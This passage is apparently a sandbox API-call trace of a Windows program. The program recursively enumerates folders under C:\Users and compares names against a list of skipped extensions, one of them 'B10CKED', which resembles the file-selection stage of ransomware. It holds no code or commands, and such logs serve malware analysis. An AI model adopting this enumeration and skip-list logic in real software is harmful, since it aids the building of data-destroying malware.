[0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0x1c9608 [0107.651] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.651] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\", cchLength=0x13 | out: lpsz="C:\\USERS\\ALL USERS\\") returned 0x13 [0107.651] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*", lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0x1c9648 [0107.652] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.652] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\*.*", lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0x1c9688 [0107.717] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0107.717] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0107.718] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.718] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.718] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\", cchLength=0x26 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\") returned 0x26 [0107.718] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\", cchLength=0x26 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\") returned 0x26 [0107.718] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0107.718] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.718] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.718] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0107.719] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.719] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.719] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0107.761] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.762] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 1 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0107.764] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0107.764] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0107.764] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0107.764] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0107.764] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.764] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Desktop\\*.*", lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0xffffffff [0107.764] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0107.764] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.764] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\*.*", lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0xffffffff [0107.765] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0107.765] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.765] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Favorites\\*.*", lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0xffffffff [0107.765] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0107.765] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.765] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\*.*", lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0x1c9688 [0107.765] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0107.765] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0107.765] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0107.765] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.765] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.765] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0107.766] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.766] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.766] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0107.853] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.853] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.853] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] 